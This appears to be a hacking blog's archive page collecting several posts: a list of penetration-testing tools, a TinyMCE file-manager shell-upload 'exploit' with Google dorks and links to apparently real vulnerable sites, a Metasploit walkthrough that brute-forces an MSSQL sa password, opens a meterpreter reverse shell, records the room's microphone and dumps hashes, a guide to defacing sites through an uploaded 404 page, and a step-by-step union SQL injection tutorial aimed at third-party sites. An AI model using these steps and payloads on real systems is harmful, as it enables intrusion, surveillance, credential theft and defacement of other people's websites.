Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label SQL injection Tutorial. Show all posts
Showing posts with label SQL injection Tutorial. Show all posts

Saturday, 10 January 2015

TOP 14 TOOLS THAT ETHICAL HACKER MUST HAVE !!!

Here is the List of tools that ethical HACKER must have a range of systems. These tools  are basically to reveal information which further results in a specific attacks on a given system. To locate weaknesses or error in a target system to gain as muchas information as possible about that network.
These tools Contains vulnerability scanning,  real exploits, Denial of Service, buffer overflow attacks and a wide range of networking integrated advanced utilities to perform such tests.
 .
303630_216468171814394_1876054076_n
.

Tools that ethical HACKER must have :

 .

1 – Nmap:

Nmap is used to scan addresses (IPV6 included), This tool is developed to gather a massive amount of information about the victim. It can scan open ports and much more.
This tool includes various scanning techniques e.g TCP connect(), UDP, TCP SYN (half open), Null scan, ACK sweep, Xmas Tree, FIN,  ICMP (ping sweep), ftp proxy (bounce attack), TCP SYN (half open),  IP Protocol, ICMP (ping sweep) and SYN sweep.
 .

2 – Wireshark:

This is very powerful tool for analysis and network troubleshooting. Wireshark is capable to view data from Live networking. It support media formats and hundreds of protocols. It is also used for development and education. Most Unix vendors and Linux supply their own Wireshark packages.
 .

3 – Cain & Able:

This tool is proven it’s self revolutionary in cyber mafia. It is capable of cracking passwords, several password retrieval jobs, routing/analyzing protocols and sniffing networks. Unlikly most of the tools it is just windows-only and is a twist to forensic tools & modern penetration testing.
 .
421921_572346579495451_1305930101_n
.

4 – MetaSploit:

MetaSploit is powerful network analysis and security tool. It is mostly used for penetration attacks because of it’s easily gathering information of victim and clean-interfacing technique.
 .

5 – Ettercap:

It is used for Man in the middle attack (MITM), these attacks are on Local area networks. It sniffs live connections & also got content filtering techniques. It has many features of host analysis and networking while it supports both active and passive dissections of various protocols.
 .

6 – Nessus:

This Tool provides vulnerability analysis of networks, asset profiling, high-speed data discovery and configuration auditing.
 .

7 – Havij:

Havij is most used testing tool for SQL injection and many other injections. It has features of database retrieval,  site’s scanning, password cracking and admin look-up. Basic purpose of it is to find  vulnerable websites and  breeze to hack.
.

8 – Kismet:

Kismet is 802.11 layer2 sniffer, wireless network detector and intrusion detection system. It supports every wireless card and can work with any appropriate hardware  on raw monitoring (rfmon) mode. Kismet supports plugin that can sniff media such as DECT. It can sniff  802.11a, 802.11n,  802.11b, sniff802.11g and traffic.
 .

9 – BackTrack Linux:

Backtrack is most popular and widely used tool bootable on CD of Linux Distro. It has got a large variety of penetration testing tools, VOIP networks, network attacks and many more testing/attacking of websites and systems. This tool is most user friendly because of its helpful and useful layout.
.
60076_514470035250500_1202821093_n
 .

10 – W3af:

W3af also known as web-focused Metasploit is an extremely flexible, popular, powerful & framework for finding vulnerabilities in exploiting web application. It’s vast features got dozens of exploitation and web assessment plugins.
 .

11 – Encase:

EnCase is computer forensics software mostly used by law enforcement agencies. Because of it’s vast usage and popularity it is forensics in a  a de-facto standard. This tool is being made to gather data from a computer in a forensically sound manner.
 .

12 – Helix:

Helix is bootable Ubuntu CD which contains multiple tools involving file systems, images, cellphones, computers & tied in to sheer power, it is very user friendly.
 .

13 – Acunetix:

Acunetix is Strong tool in website security purpose. It has variety of features for testing a website for various injections. Acunetix WVS basically checks the vulnerabilities of website, either XSS, SQL or other Injection are possible or not.
 .

14 – Burp Suite:

This tool is designed for performing testing regarding security of web applications. It  is an integrated platform and got various tools working togather to make a complete testing process. This tools is also used for exploiting security vulnerabilities & analysis of application attack surface from initial mapping.
.

.

The Penetration Test Process


  • Discovery: The process Penetration tests is a Discovery in variety of techniques e.g  scan utilities, databases, Google data & much more to get as much information about the target as possible. These discoveries are basically to reveal sensitive information which further results in a specific attacks on a given system.

  • Enumeration: After discovery of systems and specific networks the next step is to gain as much as information as possible about that network. The diffrence b/w Discovery & Enumeration depends upon state of intrusion. Enumeration task is to get reletive information about username while software and hardware version information are also obtained form it.

  • Vulnerability Identification: This is most important step in penetration testing. In vulnerability identification you have to locate the week spot of target system. To locate weaknesses or error in a target system is must needed because after that you will get to know where to launch an attack.

  • Exploitation and Launching of Attacks: After vulnerability has been located and you have identified the target’s weekspot now it is possible to launch the exploits. The main purpose of launching exploits is to get full access on victims’s system.

  • Denial of Service: This term is known as dDos (Denial of Service). This is used to check the stability of the systems either it is crashed or not. It is good habit to check the strenght or stability of a system, before the real environment attack is being made.

Reporting: This is just for educational purpose. Now after you have completed penetration test it is recomended to get user customized  for technical overview, This includes detailed recommendations, executive summary, identified vulnerabilities & other security ID numbers. These reports may be in various forms i.e pdf, html, xml etc. while every report must be modified by user’s choice.

Tuesday, 30 December 2014

Tinymce PHP file Manager, Remote File upload vulnrablity

Title :Tinymce PHP file Manager, Remote File upload vulnrablity               server : Linux
Author: NoentryPHC 
Type : webapp Exploit  
Hamr : remote shell upload  
Dork : inurl:/file_manager.php?type=img..
Goto google.com and type dork inurl:/file_manager.php?type=img & inurl:/file_manager.php?type=file to FinD vulnrable websites, to get more sites you can modify this dork, Exploit Patch : http://www.site.com/directory/tinymce/file_manager.php?type=file  so Goto http://www.site.com/directory/tinymce/file_manager.php?type=file  and upload your file there, if php & html uploading is denided, you can try Tamper Data and Live Http Headers 
Live demo : http://piter-ka.ru/media/tinymce/file_manager.php?type=file http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img 
























Saturday, 18 January 2014

How to Hack Databases: Cracking SQL Server Passwords & Owning the Server

How to Hack Databases: Cracking SQL Server Passwords 
& Owning the Server
 

In this tutorial, we'll look at how we can crack the password 
on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit. Once we have the 
metasploit command prompt, we need to define which 
module we want to use. 
In past Metasploit tutorials, we've always used exploits, 
but this one is a bit different. Instead, we will use a  
scanner  among the auxiliary modules that enables us
 to brute force 
the sa password. Let's load up mssql_login:



  • use scanner/mssql/mssql_login



 


As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary 


module. Now let's take a look at the options with this module.


  • show options



Step 2: Set Your Options

In order to run this MS SQL login module, we will need:
  1. A password file,
  2. Set the RHOSTS, and
  3. Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 c
ommonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, 
our target is at 192.168.1.103, and we will set our THREADS to 20.

 

Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password
 for the sa account.
  • exploit
  •  
 
As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient),
 it found the password on our sa account of "NullByte". Success! Now we have full sysadmin 
privileges on the database that we can hopefully convert to full system sysadmin privileges.

 

Step 4: Grab the xp__cmdshell

Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that
 to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell t
hat enables the sa account to gain a system command shell with full system admin rights. If we can i
nvoke that command shell, we may be able to load the payload of our choice on the system and 
own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this.
 Let's load it.
  • use windows/mssql/mssql_payload
  •  

 
Now, let's check the options for this exploit:
  • show options
In this case, we will try to load the meterpreter on this system, so let's:
  • set PAYLOAD windows/meterpreter/reverse_tcp
In addition, we need to set the LPORT, the LHOST, the RHOST and the password we
 recovered from the sa account from above, in this case, "NullByte".
 
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
 
Success! We have a meterpreter session!

 

 

Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, 
we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's
 try a few.

First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone
 else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.

  • meterpreter > run sound_recorder -i 100 -l /etc
 
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc 
directory. Of course, we can record as much audio as we want. We are only limited by hard drive 
space.

 

Step 6: Grab the Hash


Now, let's grab some passwords so that we can log back back in whenever we please. Remember,
 once we have the admin password, we can login any time with Metasploit's psexec exploit.
  • meterpreter > hashdump



As you can see, we were able to grab the password hashes from the system
.

We then need to either crack the hashes using John the Ripper,


FEEL FREE TO COMMENT<LIKE< ASK QUESTIONS.....

Thursday, 16 January 2014

How To Make 404 Pages in Defaced websites by Using shell

How To Make 404 Pages in Defaced websites by Using shell

What are 404 pages ? 
its a page or file which is no longer available on website,

Advantages of 404 pages in website Defacing :
if someone will trying to acess to your shell by guessing like (c99.php, r57.php etc) then it will show your custom page on Not found Link.
in Defaced site usually we upload our deface page as index.html or anyname.html
and we can see our deface page on That custom link only where we uploaded our deface page 
like : site.com/index.html, site.com/r00t.html site.com/r00t.php
by adding deface page's code in 404 page you can see your deface page on every link 
like site.com/xyz.php site.com/x.html site.com/xyz/, 

Hack facebook password
How to do it ?
1-open Note Pad
2- paste your deface page's code in noatepad
3- save file as 404.shtml 
5- now upload this file in public_html/ directory using shell
now check any error link !!
Code for 404 Pages :
<style type="text/css">body { background-color: #000;}</style>
<img src="http://a3.sphotos.ak.fbcdn.net/hphotos-ak-snc7/s720x720/432146_157462177702828_100003171391108_222151_895998112_n.jpgwidth="1198height="765" />

(replace image link with your own image in this code)

 JOIN MY SITE TO GET LATEST UPDATE 

Saturday, 21 September 2013

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking



I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice
the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how
 can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web
 application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi
vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".
  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal
way.


Download this web Application from here:
Download Now

For Installing the this application, you will need XAMPP server.

The installation procedure :



Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
if you have any doubts, check their wiki page or comment here.

Hacking website using SQL Injection -step by step guide without tool

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the MY SQL SERVER

So, here we go.
                     
Step 1: Finding Vulnerable Website
 To find vulnerability in any site you can use Google Dorks 
 Examples:---
   inurl:index.php?id=
   inurl:gallery.php?id=
   inurl:article.php?id=
   inurl:pageid=

     Here is a huge list of Google Dorks  Click here to See it 







after getting google dorks copy and paste the dork in google u will see lots of sites. open these
sites one by to check for vulnerability



Note
if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg: 
            site:www.victimsite.com inurl:index.php?id=            


Step 2. Checking The Vulnerability 

        To check vulnerability in any site simply put at the end of the url
        like this
                    www.du.ac.in/index.php?id=4‎'

If u Got any error just like this then the site vulnerable 
   You have an error in your SQL syntax; check the manual that corresponds to your MYSQl server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg


http://www.victimsite.com/index.php?id=2 order by 1
 http://www.victimsite.com/index.php?id=2 order by 2

If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)



 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
 Let us find  the vulnerable column by trying the query "union select columns_sequence".

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-

it will display this 

IT says that column 3 and 7 are vunlerable 
Let us take the first vulnerable column '3' . We can inject our query in this column 


Step 5: Finding version,database,user

Replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table NameIf the Database version is 5 or above. 
If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name)
 and add the "from information_schema.tables where table_schema=database()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables 
where table_schema=database()--


Now it will display the list  of table names. Find the table name which is related 
with the admin or user.

Let us choose the "admin " table.

Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with
 the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--
with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:


Once you installed the add-on, you can see a toolbar that will look like the following
 one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want
 to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns 
where table_name=CHAR(97, 100, 109, 105, 110)--


The above query will display the list of column. 

For example: admin,password,admin_id,admin_name,admin_password,active,id
,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,
password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=
CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
         http://www.victimsite.com/index.php?id=-2 
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 
from admin--

If the above query displays the 'column is not found' erro, then try another column name
 from the list.

If we got luck, then it will display the data stored in the database depending on your 
column name.  For instance, username and password column will display the login 
credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/


If you got luck ,you will find the admin page using above urls. or you can some
kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow
 the above steps against third-party websites.  If you want to learn SQL injection attack
method , then you can learn in safe environment by setup your own lab

HOpe u like the tutorial join us and like us on facebook